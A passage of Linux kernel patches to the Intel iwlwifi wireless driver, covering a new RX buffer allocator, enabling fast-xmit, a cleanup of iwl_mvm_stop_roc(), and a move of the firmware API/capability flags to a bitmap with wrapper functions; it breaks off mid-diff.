struct iwl_trans_pcie *trans_pcie = IWL_TRANS_GET_PCIE_TRANS(trans); + struct iwl_rb_allocator *rba = &trans_pcie->rba; + int i; + + lockdep_assert_held(&rba->lock); + + for (i = 0; i < RX_POOL_SIZE; i++) { + if (!rba->pool[i].page) + continue; + dma_unmap_page(trans->dev, rba->pool[i].page_dma, + PAGE_SIZE << trans_pcie->rx_page_order, + DMA_FROM_DEVICE); + __free_pages(rba->pool[i].page, trans_pcie->rx_page_order); + rba->pool[i].page = NULL; + } +} + int iwl_pcie_rx_init(struct iwl_trans *trans) { struct iwl_trans_pcie *trans_pcie = IWL_TRANS_GET_PCIE_TRANS(trans); struct iwl_rxq *rxq = &trans_pcie->rxq; + struct iwl_rb_allocator *rba = &trans_pcie->rba; int i, err; if (!rxq->bd) { @@ -503,11 +687,21 @@ int iwl_pcie_rx_init(struct iwl_trans *trans) if (err) return err; } + if (!rba->alloc_wq) + rba->alloc_wq = alloc_workqueue("rb_allocator", + WQ_HIGHPRI | WQ_UNBOUND, 1); + INIT_WORK(&rba->rx_alloc, iwl_pcie_rx_allocator_work); + + spin_lock(&rba->lock); + atomic_set(&rba->req_pending, 0); + atomic_set(&rba->req_ready, 0); + /* free all first - we might be reconfigured for a different size */ + iwl_pcie_rx_free_rba(trans); + iwl_pcie_rx_init_rba(rba); + spin_unlock(&rba->lock); spin_lock(&rxq->lock); - INIT_WORK(&trans_pcie->rx_replenish, 
iwl_pcie_rx_replenish_work); - /* free all first - we might be reconfigured for a different size */ iwl_pcie_rxq_free_rbs(trans); iwl_pcie_rx_init_rxb_lists(rxq); @@ -522,7 +716,7 @@ int iwl_pcie_rx_init(struct iwl_trans *trans) memset(rxq->rb_stts, 0, sizeof(*rxq->rb_stts)); spin_unlock(&rxq->lock); - iwl_pcie_rx_replenish(trans, GFP_KERNEL); + iwl_pcie_rx_replenish(trans); iwl_pcie_rx_hw_init(trans, rxq); @@ -537,6 +731,7 @@ void iwl_pcie_rx_free(struct iwl_trans *trans) { struct iwl_trans_pcie *trans_pcie = IWL_TRANS_GET_PCIE_TRANS(trans); struct iwl_rxq *rxq = &trans_pcie->rxq; + struct iwl_rb_allocator *rba = &trans_pcie->rba; /*if rxq->bd is NULL, it means that nothing has been allocated, * exit now */ @@ -545,7 +740,15 @@ void iwl_pcie_rx_free(struct iwl_trans *trans) return; } - cancel_work_sync(&trans_pcie->rx_replenish); + cancel_work_sync(&rba->rx_alloc); + if (rba->alloc_wq) { + destroy_workqueue(rba->alloc_wq); + rba->alloc_wq = NULL; + } + + spin_lock(&rba->lock); + iwl_pcie_rx_free_rba(trans); + spin_unlock(&rba->lock); spin_lock(&rxq->lock); iwl_pcie_rxq_free_rbs(trans); @@ -566,6 +769,43 @@ void iwl_pcie_rx_free(struct iwl_trans *trans) rxq->rb_stts = NULL; } +/* + * iwl_pcie_rx_reuse_rbd - Recycle used RBDs + * + * Called when a RBD can be reused. The RBD is transferred to the allocator. + * When there are 2 empty RBDs - a request for allocation is posted + */ +static void iwl_pcie_rx_reuse_rbd(struct iwl_trans *trans, + struct iwl_rx_mem_buffer *rxb, + struct iwl_rxq *rxq) +{ + struct iwl_trans_pcie *trans_pcie = IWL_TRANS_GET_PCIE_TRANS(trans); + struct iwl_rb_allocator *rba = &trans_pcie->rba; + + /* Count the used RBDs */ + rxq->used_count++; + + /* Move the RBD to the used list, will be moved to allocator in batches + * before claiming or posting a request*/ + list_add_tail(&rxb->list, &rxq->rx_used); + + /* If we have RX_POST_REQ_ALLOC new released rx buffers - + * issue a request for allocator. Modulo RX_CLAIM_REQ_ALLOC is + * used for the case we failed to claim RX_CLAIM_REQ_ALLOC, + * after but we still need to post another request. + */ + if ((rxq->used_count % RX_CLAIM_REQ_ALLOC) == RX_POST_REQ_ALLOC) { + /* Move the 2 RBDs to the allocator ownership. 
+ Allocator has another 6 from pool for the request completion*/ + spin_lock(&rba->lock); + list_splice_tail_init(&rxq->rx_used, &rba->rbd_empty); + spin_unlock(&rba->lock); + + atomic_inc(&rba->req_pending); + queue_work(rba->alloc_wq, &rba->rx_alloc); + } +} + static void iwl_pcie_rx_handle_rb(struct iwl_trans *trans, struct iwl_rx_mem_buffer *rxb) { @@ -688,13 +928,13 @@ static void iwl_pcie_rx_handle_rb(struct iwl_trans *trans, */ __free_pages(rxb->page, trans_pcie->rx_page_order); rxb->page = NULL; - list_add_tail(&rxb->list, &rxq->rx_used); + iwl_pcie_rx_reuse_rbd(trans, rxb, rxq); } else { list_add_tail(&rxb->list, &rxq->rx_free); rxq->free_count++; } } else - list_add_tail(&rxb->list, &rxq->rx_used); + iwl_pcie_rx_reuse_rbd(trans, rxb, rxq); } /* @@ -704,10 +944,7 @@ static void iwl_pcie_rx_handle(struct iwl_trans *trans) { struct iwl_trans_pcie *trans_pcie = IWL_TRANS_GET_PCIE_TRANS(trans); struct iwl_rxq *rxq = &trans_pcie->rxq; - u32 r, i; - u8 fill_rx = 0; - u32 count = 8; - int total_empty; + u32 r, i, j; restart: spin_lock(&rxq->lock); @@ -720,14 +957,6 @@ static void iwl_pcie_rx_handle(struct iwl_trans *trans) if (i == r) IWL_DEBUG_RX(trans, "HW = SW = %d\n", r); - /* calculate total frames need to be restock after handling RX */ - total_empty = r - rxq->write_actual; - if (total_empty < 0) - total_empty += RX_QUEUE_SIZE; - - if (total_empty > (RX_QUEUE_SIZE / 2)) - fill_rx = 1; - while (i != r) { struct iwl_rx_mem_buffer *rxb; @@ -739,29 +968,48 @@ static void iwl_pcie_rx_handle(struct iwl_trans *trans) iwl_pcie_rx_handle_rb(trans, rxb); i = (i + 1) & RX_QUEUE_MASK; - /* If there are a lot of unused frames, - * restock the Rx queue so ucode wont assert. */ - if (fill_rx) { - count++; - if (count >= 8) { - rxq->read = i; - spin_unlock(&rxq->lock); - iwl_pcie_rx_replenish(trans, GFP_ATOMIC); - count = 0; - goto restart; + + /* If we have RX_CLAIM_REQ_ALLOC released rx buffers - + * try to claim the pre-allocated buffers from the allocator */ + if (rxq->used_count >= RX_CLAIM_REQ_ALLOC) { + struct iwl_rb_allocator *rba = &trans_pcie->rba; + struct iwl_rx_mem_buffer *out[RX_CLAIM_REQ_ALLOC]; + + /* Add the remaining 6 empty RBDs for allocator use */ + spin_lock(&rba->lock); + list_splice_tail_init(&rxq->rx_used, &rba->rbd_empty); + spin_unlock(&rba->lock); + + /* If not ready - continue, will try to reclaim later. 
+ * No need to reschedule work - allocator exits only on + * success */ + if (!iwl_pcie_rx_allocator_get(trans, out)) { + /* If success - then RX_CLAIM_REQ_ALLOC + * buffers were retrieved and should be added + * to free list */ + rxq->used_count -= RX_CLAIM_REQ_ALLOC; + for (j = 0; j < RX_CLAIM_REQ_ALLOC; j++) { + list_add_tail(&out[j]->list, + &rxq->rx_free); + rxq->free_count++; + } } } + /* handle restock for two cases: + * - we just pulled buffers from the allocator + * - we have 8+ unstolen pages accumulated */ + if (rxq->free_count >= RX_CLAIM_REQ_ALLOC) { + rxq->read = i; + spin_unlock(&rxq->lock); + iwl_pcie_rxq_restock(trans); + goto restart; + } } /* Backtrack one entry */ rxq->read = i; spin_unlock(&rxq->lock); - if (fill_rx) - iwl_pcie_rx_replenish(trans, GFP_ATOMIC); - else - iwl_pcie_rxq_restock(trans); - if (trans_pcie->napi.poll) napi_gro_flush(&trans_pcie->napi, false); } From 0d060384be7b65cfc33a86be75d5cc41af78c654 Mon Sep 17 00:00:00 2001 From: Johannes Berg Date: Fri, 17 Apr 2015 15:50:43 +0200 Subject: [PATCH 629/872] iwlwifi: mvm: enable IEEE80211_HW_SUPPORT_FAST_XMIT Since the firmware is responsible for duration calculation, the driver can easily support fast-xmit. Signed-off-by: Johannes Berg Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/mvm/mac80211.c | 1 + 1 file changed, 1 insertion(+) diff --git a/drivers/net/wireless/iwlwifi/mvm/mac80211.c b/drivers/net/wireless/iwlwifi/mvm/mac80211.c index 9e517e20a14e..57d75d14fc80 100644 --- a/drivers/net/wireless/iwlwifi/mvm/mac80211.c +++ b/drivers/net/wireless/iwlwifi/mvm/mac80211.c @@ -428,6 +428,7 @@ int iwl_mvm_mac_setup_register(struct iwl_mvm *mvm) IEEE80211_HW_TIMING_BEACON_ONLY | IEEE80211_HW_CONNECTION_MONITOR | IEEE80211_HW_CHANCTX_STA_CSA | + IEEE80211_HW_SUPPORT_FAST_XMIT | IEEE80211_HW_SUPPORTS_CLONED_SKBS; hw->queues = mvm->first_agg_queue; From aa42fb2420d4dc213d8306a9e0fdddf7ba83a10c Mon Sep 17 00:00:00 2001 From: Johannes Berg Date: Fri, 17 Apr 2015 15:50:43 +0200 Subject: [PATCH 630/872] iwlwifi: dvm: enable IEEE80211_HW_SUPPORT_FAST_XMIT Since the firmware is responsible for duration calculation, the driver can easily support fast-xmit. Signed-off-by: Johannes Berg Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/dvm/mac80211.c | 1 + 1 file changed, 1 insertion(+) diff --git a/drivers/net/wireless/iwlwifi/dvm/mac80211.c b/drivers/net/wireless/iwlwifi/dvm/mac80211.c index ba7fc42edf97..852461ffe98f 100644 --- a/drivers/net/wireless/iwlwifi/dvm/mac80211.c +++ b/drivers/net/wireless/iwlwifi/dvm/mac80211.c @@ -112,6 +112,7 @@ int iwlagn_mac_setup_register(struct iwl_priv *priv, IEEE80211_HW_QUEUE_CONTROL | IEEE80211_HW_SUPPORTS_PS | IEEE80211_HW_SUPPORTS_DYNAMIC_PS | + IEEE80211_HW_SUPPORT_FAST_XMIT | IEEE80211_HW_WANT_MONITOR_VIF; hw->offchannel_tx_hw_queue = IWL_AUX_QUEUE; From ebf17ff9bb46206ca7a4bc7260bff52f593c25db Mon Sep 17 00:00:00 2001 From: Johannes Berg Date: Mon, 1 Jun 2015 23:38:23 +0200 Subject: [PATCH 631/872] iwlwifi: mvm: simplify iwl_mvm_stop_roc() As pointed out by smatch, there's no need for a loop that always immediately terminates. Use an if statement instead and while at it clean up the mvmvif initialization. 
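For reference, a minimal sketch of the pattern this cleanup targets (hypothetical foo_* names, not the driver code): a list walk whose body unconditionally exits after the first entry is what smatch flags, and list_first_entry_or_null() expresses the same intent directly.

#include <linux/list.h>

struct foo_event {
	struct list_head list;
	int id;
};

/* Before: the "loop" body always returns, so only the first entry can ever be seen. */
static struct foo_event *foo_first_event_loop(struct list_head *head)
{
	struct foo_event *ev;

	list_for_each_entry(ev, head, list)
		return ev;
	return NULL;
}

/* After: the single-entry intent is explicit. */
static struct foo_event *foo_first_event(struct list_head *head)
{
	return list_first_entry_or_null(head, struct foo_event, list);
}
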
Signed-off-by: Johannes Berg Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/mvm/time-event.c | 18 +++++++----------- 1 file changed, 7 insertions(+), 11 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/time-event.c b/drivers/net/wireless/iwlwifi/mvm/time-event.c index a7448cf01688..d24b6a83e68c 100644 --- a/drivers/net/wireless/iwlwifi/mvm/time-event.c +++ b/drivers/net/wireless/iwlwifi/mvm/time-event.c @@ -797,13 +797,12 @@ int iwl_mvm_start_p2p_roc(struct iwl_mvm *mvm, struct ieee80211_vif *vif, void iwl_mvm_stop_roc(struct iwl_mvm *mvm) { - struct iwl_mvm_vif *mvmvif; + struct iwl_mvm_vif *mvmvif = NULL; struct iwl_mvm_time_event_data *te_data; bool is_p2p = false; lockdep_assert_held(&mvm->mutex); - mvmvif = NULL; spin_lock_bh(&mvm->time_event_lock); /* @@ -821,17 +820,14 @@ void iwl_mvm_stop_roc(struct iwl_mvm *mvm) } } - /* - * Iterate over the list of aux roc time events and find the time - * event that is associated with a BSS interface. - * This assumes that a BSS interface can have only a single time - * event at any given time and this time event corresponds to a ROC - * request + /* There can only be at most one AUX ROC time event, we just use the + * list to simplify/unify code. Remove it if it exists. */ - list_for_each_entry(te_data, &mvm->aux_roc_te_list, list) { + te_data = list_first_entry_or_null(&mvm->aux_roc_te_list, + struct iwl_mvm_time_event_data, + list); + if (te_data) mvmvif = iwl_mvm_vif_from_mac80211(te_data->vif); - goto remove_te; - } remove_te: spin_unlock_bh(&mvm->time_event_lock); From 859d914c8f5ca5b3c9274ad69c4c942954f67cda Mon Sep 17 00:00:00 2001 From: Johannes Berg Date: Mon, 1 Jun 2015 17:11:11 +0200 Subject: [PATCH 632/872] iwlwifi: prepare for higher API/CAPA bits Currently, loading the firmware fails when it has higher API or CAPA bits than the driver supports. That's an issue with integration. At the same time, actually using api[0] and capa[0] will become confusing when we also have api[1] and capa[1], and it's almost certain that we'll mix up the bits and use the bits for api[1] with api[0] by accident. Avoid all this by translating the API/CAPA bits to the regular kernel test_bit() format, and also providing wrapper functions. Also use the __bitwise__ facility of sparse to check that we're testing the right one. 
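As a rough illustration of the scheme described above (foo_* names are made up, not the iwlwifi definitions): bit numbers get a sparse __bitwise__ type so they cannot be mixed up with plain masks or with bits of a different word, the parsed per-word u32 flags are folded into one long bitmap, and a small wrapper hides the test_bit() call.

#include <linux/bitops.h>
#include <linux/types.h>

typedef unsigned int __bitwise__ foo_feature_t;

/* bit 8 of flags word 1, i.e. absolute bit 40 */
#define FOO_FEATURE_FANCY_SCAN	((__force foo_feature_t)40)

#define FOO_FEATURE_MAX_BITS	64

struct foo_capabilities {
	unsigned long _features[BITS_TO_LONGS(FOO_FEATURE_MAX_BITS)];
};

/* TLV parsing: fold one 32-bit flags word into the bitmap. */
static inline void foo_set_feature_word(struct foo_capabilities *c,
					u32 word_index, u32 flags)
{
	int i;

	for (i = 0; i < 32; i++)
		if (flags & BIT(i))
			__set_bit(i + 32 * word_index, c->_features);
}

/* Callers test features by name instead of indexing a word and masking. */
static inline bool foo_has_feature(const struct foo_capabilities *c,
				   foo_feature_t f)
{
	return test_bit((__force long)f, c->_features);
}
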
Signed-off-by: Johannes Berg Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/iwl-drv.c | 26 +++++--- drivers/net/wireless/iwlwifi/iwl-fw-file.h | 67 +++++++++++---------- drivers/net/wireless/iwlwifi/iwl-fw.h | 20 +++++- drivers/net/wireless/iwlwifi/mvm/coex.c | 22 ++++--- drivers/net/wireless/iwlwifi/mvm/debugfs.c | 9 ++- drivers/net/wireless/iwlwifi/mvm/fw.c | 4 +- drivers/net/wireless/iwlwifi/mvm/mac80211.c | 47 ++++++++------- drivers/net/wireless/iwlwifi/mvm/mvm.h | 21 ++++--- drivers/net/wireless/iwlwifi/mvm/nvm.c | 8 +-- drivers/net/wireless/iwlwifi/mvm/rs.c | 10 +-- drivers/net/wireless/iwlwifi/mvm/rx.c | 4 +- drivers/net/wireless/iwlwifi/mvm/scan.c | 33 +++++----- drivers/net/wireless/iwlwifi/mvm/tx.c | 4 +- drivers/net/wireless/iwlwifi/mvm/utils.c | 2 +- 14 files changed, 161 insertions(+), 116 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/iwl-drv.c b/drivers/net/wireless/iwlwifi/iwl-drv.c index 12566c8cb275..6685259927f8 100644 --- a/drivers/net/wireless/iwlwifi/iwl-drv.c +++ b/drivers/net/wireless/iwlwifi/iwl-drv.c @@ -423,13 +423,19 @@ static int iwl_set_ucode_api_flags(struct iwl_drv *drv, const u8 *data, { const struct iwl_ucode_api *ucode_api = (void *)data; u32 api_index = le32_to_cpu(ucode_api->api_index); + u32 api_flags = le32_to_cpu(ucode_api->api_flags); + int i; - if (api_index >= IWL_API_ARRAY_SIZE) { + if (api_index >= IWL_API_MAX_BITS / 32) { IWL_ERR(drv, "api_index larger than supported by driver\n"); - return -EINVAL; + /* don't return an error so we can load FW that has more bits */ + return 0; } - capa->api[api_index] = le32_to_cpu(ucode_api->api_flags); + for (i = 0; i < 32; i++) { + if (api_flags & BIT(i)) + __set_bit(i + 32 * api_index, capa->_api); + } return 0; } @@ -439,13 +445,19 @@ static int iwl_set_ucode_capabilities(struct iwl_drv *drv, const u8 *data, { const struct iwl_ucode_capa *ucode_capa = (void *)data; u32 api_index = le32_to_cpu(ucode_capa->api_index); + u32 api_flags = le32_to_cpu(ucode_capa->api_capa); + int i; - if (api_index >= IWL_CAPABILITIES_ARRAY_SIZE) { + if (api_index >= IWL_CAPABILITIES_MAX_BITS / 32) { IWL_ERR(drv, "api_index larger than supported by driver\n"); - return -EINVAL; + /* don't return an error so we can load FW that has more bits */ + return 0; } - capa->capa[api_index] = le32_to_cpu(ucode_capa->api_capa); + for (i = 0; i < 32; i++) { + if (api_flags & BIT(i)) + __set_bit(i + 32 * api_index, capa->_capa); + } return 0; } @@ -1148,7 +1160,7 @@ static void iwl_req_fw_callback(const struct firmware *ucode_raw, void *context) if (err) goto try_again; - if (drv->fw.ucode_capa.api[0] & IWL_UCODE_TLV_API_NEW_VERSION) + if (fw_has_api(&drv->fw.ucode_capa, IWL_UCODE_TLV_API_NEW_VERSION)) api_ver = drv->fw.ucode_ver; else api_ver = IWL_UCODE_API(drv->fw.ucode_ver); diff --git a/drivers/net/wireless/iwlwifi/iwl-fw-file.h b/drivers/net/wireless/iwlwifi/iwl-fw-file.h index 5b7c0ae52f93..7efd62908e61 100644 --- a/drivers/net/wireless/iwlwifi/iwl-fw-file.h +++ b/drivers/net/wireless/iwlwifi/iwl-fw-file.h @@ -237,6 +237,8 @@ enum iwl_ucode_tlv_flag { IWL_UCODE_TLV_FLAGS_GO_UAPSD = BIT(30), }; +typedef unsigned int __bitwise__ iwl_ucode_tlv_api_t; + /** * enum iwl_ucode_tlv_api - ucode api * @IWL_UCODE_TLV_API_BT_COEX_SPLIT: new API for BT Coex @@ -259,21 +261,23 @@ enum iwl_ucode_tlv_flag { * instead of 3. 
*/ enum iwl_ucode_tlv_api { - IWL_UCODE_TLV_API_BT_COEX_SPLIT = BIT(3), - IWL_UCODE_TLV_API_FRAGMENTED_SCAN = BIT(8), - IWL_UCODE_TLV_API_WIFI_MCC_UPDATE = BIT(9), - IWL_UCODE_TLV_API_HDC_PHASE_0 = BIT(10), - IWL_UCODE_TLV_API_TX_POWER_DEV = BIT(11), - IWL_UCODE_TLV_API_BASIC_DWELL = BIT(13), - IWL_UCODE_TLV_API_SCD_CFG = BIT(15), - IWL_UCODE_TLV_API_SINGLE_SCAN_EBS = BIT(16), - IWL_UCODE_TLV_API_ASYNC_DTM = BIT(17), - IWL_UCODE_TLV_API_LQ_SS_PARAMS = BIT(18), - IWL_UCODE_TLV_API_STATS_V10 = BIT(19), - IWL_UCODE_TLV_API_NEW_VERSION = BIT(20), - IWL_UCODE_TLV_API_EXT_SCAN_PRIORITY = BIT(24), + IWL_UCODE_TLV_API_BT_COEX_SPLIT = (__force iwl_ucode_tlv_api_t)3, + IWL_UCODE_TLV_API_FRAGMENTED_SCAN = (__force iwl_ucode_tlv_api_t)8, + IWL_UCODE_TLV_API_WIFI_MCC_UPDATE = (__force iwl_ucode_tlv_api_t)9, + IWL_UCODE_TLV_API_HDC_PHASE_0 = (__force iwl_ucode_tlv_api_t)10, + IWL_UCODE_TLV_API_TX_POWER_DEV = (__force iwl_ucode_tlv_api_t)11, + IWL_UCODE_TLV_API_BASIC_DWELL = (__force iwl_ucode_tlv_api_t)13, + IWL_UCODE_TLV_API_SCD_CFG = (__force iwl_ucode_tlv_api_t)15, + IWL_UCODE_TLV_API_SINGLE_SCAN_EBS = (__force iwl_ucode_tlv_api_t)16, + IWL_UCODE_TLV_API_ASYNC_DTM = (__force iwl_ucode_tlv_api_t)17, + IWL_UCODE_TLV_API_LQ_SS_PARAMS = (__force iwl_ucode_tlv_api_t)18, + IWL_UCODE_TLV_API_STATS_V10 = (__force iwl_ucode_tlv_api_t)19, + IWL_UCODE_TLV_API_NEW_VERSION = (__force iwl_ucode_tlv_api_t)20, + IWL_UCODE_TLV_API_EXT_SCAN_PRIORITY = (__force iwl_ucode_tlv_api_t)24, }; +typedef unsigned int __bitwise__ iwl_ucode_tlv_capa_t; + /** * enum iwl_ucode_tlv_capa - ucode capabilities * @IWL_UCODE_TLV_CAPA_D0I3_SUPPORT: supports D0i3 @@ -302,22 +306,22 @@ enum iwl_ucode_tlv_api { * @IWL_UCODE_TLV_CAPA_BT_COEX_RRC: supports BT Coex RRC */ enum iwl_ucode_tlv_capa { - IWL_UCODE_TLV_CAPA_D0I3_SUPPORT = BIT(0), - IWL_UCODE_TLV_CAPA_LAR_SUPPORT = BIT(1), - IWL_UCODE_TLV_CAPA_UMAC_SCAN = BIT(2), - IWL_UCODE_TLV_CAPA_BEAMFORMER = BIT(3), - IWL_UCODE_TLV_CAPA_TDLS_SUPPORT = BIT(6), - IWL_UCODE_TLV_CAPA_TXPOWER_INSERTION_SUPPORT = BIT(8), - IWL_UCODE_TLV_CAPA_DS_PARAM_SET_IE_SUPPORT = BIT(9), - IWL_UCODE_TLV_CAPA_WFA_TPC_REP_IE_SUPPORT = BIT(10), - IWL_UCODE_TLV_CAPA_QUIET_PERIOD_SUPPORT = BIT(11), - IWL_UCODE_TLV_CAPA_DQA_SUPPORT = BIT(12), - IWL_UCODE_TLV_CAPA_TDLS_CHANNEL_SWITCH = BIT(13), - IWL_UCODE_TLV_CAPA_HOTSPOT_SUPPORT = BIT(18), - IWL_UCODE_TLV_CAPA_RADIO_BEACON_STATS = BIT(22), - IWL_UCODE_TLV_CAPA_BT_COEX_PLCR = BIT(28), - IWL_UCODE_TLV_CAPA_LAR_MULTI_MCC = BIT(29), - IWL_UCODE_TLV_CAPA_BT_COEX_RRC = BIT(30), + IWL_UCODE_TLV_CAPA_D0I3_SUPPORT = (__force iwl_ucode_tlv_capa_t)0, + IWL_UCODE_TLV_CAPA_LAR_SUPPORT = (__force iwl_ucode_tlv_capa_t)1, + IWL_UCODE_TLV_CAPA_UMAC_SCAN = (__force iwl_ucode_tlv_capa_t)2, + IWL_UCODE_TLV_CAPA_BEAMFORMER = (__force iwl_ucode_tlv_capa_t)3, + IWL_UCODE_TLV_CAPA_TDLS_SUPPORT = (__force iwl_ucode_tlv_capa_t)6, + IWL_UCODE_TLV_CAPA_TXPOWER_INSERTION_SUPPORT = (__force iwl_ucode_tlv_capa_t)8, + IWL_UCODE_TLV_CAPA_DS_PARAM_SET_IE_SUPPORT = (__force iwl_ucode_tlv_capa_t)9, + IWL_UCODE_TLV_CAPA_WFA_TPC_REP_IE_SUPPORT = (__force iwl_ucode_tlv_capa_t)10, + IWL_UCODE_TLV_CAPA_QUIET_PERIOD_SUPPORT = (__force iwl_ucode_tlv_capa_t)11, + IWL_UCODE_TLV_CAPA_DQA_SUPPORT = (__force iwl_ucode_tlv_capa_t)12, + IWL_UCODE_TLV_CAPA_TDLS_CHANNEL_SWITCH = (__force iwl_ucode_tlv_capa_t)13, + IWL_UCODE_TLV_CAPA_HOTSPOT_SUPPORT = (__force iwl_ucode_tlv_capa_t)18, + IWL_UCODE_TLV_CAPA_RADIO_BEACON_STATS = (__force iwl_ucode_tlv_capa_t)22, + IWL_UCODE_TLV_CAPA_BT_COEX_PLCR = (__force 
iwl_ucode_tlv_capa_t)28, + IWL_UCODE_TLV_CAPA_LAR_MULTI_MCC = (__force iwl_ucode_tlv_capa_t)29, + IWL_UCODE_TLV_CAPA_BT_COEX_RRC = (__force iwl_ucode_tlv_capa_t)30, }; /* The default calibrate table size if not specified by firmware file */ @@ -328,13 +332,14 @@ enum iwl_ucode_tlv_capa { /* The default max probe length if not specified by the firmware file */ #define IWL_DEFAULT_MAX_PROBE_LENGTH 200 +#define IWL_API_MAX_BITS 64 +#define IWL_CAPABILITIES_MAX_BITS 64 + /* * For 16.0 uCode and above, there is no differentiation between sections, * just an offset to the HW address. */ #define IWL_UCODE_SECTION_MAX 12 -#define IWL_API_ARRAY_SIZE 1 -#define IWL_CAPABILITIES_ARRAY_SIZE 1 #define CPU1_CPU2_SEPARATOR_SECTION 0xFFFFCCCC /* uCode version contains 4 values: Major/Minor/API/Serial */ diff --git a/drivers/net/wireless/iwlwifi/iwl-fw.h b/drivers/net/wireless/iwlwifi/iwl-fw.h index cdc7f1edaed9..3e3c9d8b3c37 100644 --- a/drivers/net/wireless/iwlwifi/iwl-fw.h +++ b/drivers/net/wireless/iwlwifi/iwl-fw.h @@ -32,7 +32,7 @@ * BSD LICENSE * * Copyright(c) 2005 - 2014 Intel Corporation. All rights reserved. - * Copyright(c) 2013 - 2014 Intel Mobile Communications GmbH + * Copyright(c) 2013 - 2015 Intel Mobile Communications GmbH * All rights reserved. * * Redistribution and use in source and binary forms, with or without @@ -105,10 +105,24 @@ struct iwl_ucode_capabilities { u32 n_scan_channels; u32 standard_phy_calibration_size; u32 flags; - u32 api[IWL_API_ARRAY_SIZE]; - u32 capa[IWL_CAPABILITIES_ARRAY_SIZE]; + unsigned long _api[BITS_TO_LONGS(IWL_API_MAX_BITS)]; + unsigned long _capa[BITS_TO_LONGS(IWL_CAPABILITIES_MAX_BITS)]; }; +static inline bool +fw_has_api(const struct iwl_ucode_capabilities *capabilities, + iwl_ucode_tlv_api_t api) +{ + return test_bit((__force long)api, capabilities->_api); +} + +static inline bool +fw_has_capa(const struct iwl_ucode_capabilities *capabilities, + iwl_ucode_tlv_capa_t capa) +{ + return test_bit((__force long)capa, capabilities->_capa); +} + /* one for each uCode image (inst/data, init/runtime/wowlan) */ struct fw_desc { const void *data; /* vmalloc'ed data */ diff --git a/drivers/net/wireless/iwlwifi/mvm/coex.c b/drivers/net/wireless/iwlwifi/mvm/coex.c index 662fa9c09624..b4737e296c92 100644 --- a/drivers/net/wireless/iwlwifi/mvm/coex.c +++ b/drivers/net/wireless/iwlwifi/mvm/coex.c @@ -411,7 +411,7 @@ int iwl_send_bt_init_conf(struct iwl_mvm *mvm) struct iwl_bt_coex_cmd bt_cmd = {}; u32 mode; - if (!(mvm->fw->ucode_capa.api[0] & IWL_UCODE_TLV_API_BT_COEX_SPLIT)) + if (!fw_has_api(&mvm->fw->ucode_capa, IWL_UCODE_TLV_API_BT_COEX_SPLIT)) return iwl_send_bt_init_conf_old(mvm); lockdep_assert_held(&mvm->mutex); @@ -732,7 +732,7 @@ int iwl_mvm_rx_bt_coex_notif(struct iwl_mvm *mvm, struct iwl_rx_packet *pkt = rxb_addr(rxb); struct iwl_bt_coex_profile_notif *notif = (void *)pkt->data; - if (!(mvm->fw->ucode_capa.api[0] & IWL_UCODE_TLV_API_BT_COEX_SPLIT)) + if (!fw_has_api(&mvm->fw->ucode_capa, IWL_UCODE_TLV_API_BT_COEX_SPLIT)) return iwl_mvm_rx_bt_coex_notif_old(mvm, rxb, dev_cmd); IWL_DEBUG_COEX(mvm, "BT Coex Notification received\n"); @@ -762,7 +762,8 @@ void iwl_mvm_bt_rssi_event(struct iwl_mvm *mvm, struct ieee80211_vif *vif, struct iwl_mvm_vif *mvmvif = iwl_mvm_vif_from_mac80211(vif); int ret; - if (!(mvm->fw->ucode_capa.api[0] & IWL_UCODE_TLV_API_BT_COEX_SPLIT)) { + if (!fw_has_api(&mvm->fw->ucode_capa, + IWL_UCODE_TLV_API_BT_COEX_SPLIT)) { iwl_mvm_bt_rssi_event_old(mvm, vif, rssi_event); return; } @@ -813,7 +814,7 @@ u16 iwl_mvm_coex_agg_time_limit(struct 
iwl_mvm *mvm, struct iwl_mvm_phy_ctxt *phy_ctxt = mvmvif->phy_ctxt; enum iwl_bt_coex_lut_type lut_type; - if (!(mvm->fw->ucode_capa.api[0] & IWL_UCODE_TLV_API_BT_COEX_SPLIT)) + if (!fw_has_api(&mvm->fw->ucode_capa, IWL_UCODE_TLV_API_BT_COEX_SPLIT)) return iwl_mvm_coex_agg_time_limit_old(mvm, sta); if (IWL_COEX_IS_TTC_ON(mvm->last_bt_notif.ttc_rrc_status, phy_ctxt->id)) @@ -840,7 +841,7 @@ bool iwl_mvm_bt_coex_is_mimo_allowed(struct iwl_mvm *mvm, struct iwl_mvm_phy_ctxt *phy_ctxt = mvmvif->phy_ctxt; enum iwl_bt_coex_lut_type lut_type; - if (!(mvm->fw->ucode_capa.api[0] & IWL_UCODE_TLV_API_BT_COEX_SPLIT)) + if (!fw_has_api(&mvm->fw->ucode_capa, IWL_UCODE_TLV_API_BT_COEX_SPLIT)) return iwl_mvm_bt_coex_is_mimo_allowed_old(mvm, sta); if (IWL_COEX_IS_TTC_ON(mvm->last_bt_notif.ttc_rrc_status, phy_ctxt->id)) @@ -870,7 +871,7 @@ bool iwl_mvm_bt_coex_is_ant_avail(struct iwl_mvm *mvm, u8 ant) if (ant & mvm->cfg->non_shared_ant) return true; - if (!(mvm->fw->ucode_capa.api[0] & IWL_UCODE_TLV_API_BT_COEX_SPLIT)) + if (!fw_has_api(&mvm->fw->ucode_capa, IWL_UCODE_TLV_API_BT_COEX_SPLIT)) return iwl_mvm_bt_coex_is_shared_ant_avail_old(mvm); return le32_to_cpu(mvm->last_bt_notif.bt_activity_grading) < @@ -883,7 +884,7 @@ bool iwl_mvm_bt_coex_is_shared_ant_avail(struct iwl_mvm *mvm) if (mvm->cfg->bt_shared_single_ant) return true; - if (!(mvm->fw->ucode_capa.api[0] & IWL_UCODE_TLV_API_BT_COEX_SPLIT)) + if (!fw_has_api(&mvm->fw->ucode_capa, IWL_UCODE_TLV_API_BT_COEX_SPLIT)) return iwl_mvm_bt_coex_is_shared_ant_avail_old(mvm); return le32_to_cpu(mvm->last_bt_notif.bt_activity_grading) < BT_HIGH_TRAFFIC; @@ -894,7 +895,7 @@ bool iwl_mvm_bt_coex_is_tpc_allowed(struct iwl_mvm *mvm, { u32 bt_activity = le32_to_cpu(mvm->last_bt_notif.bt_activity_grading); - if (!(mvm->fw->ucode_capa.api[0] & IWL_UCODE_TLV_API_BT_COEX_SPLIT)) + if (!fw_has_api(&mvm->fw->ucode_capa, 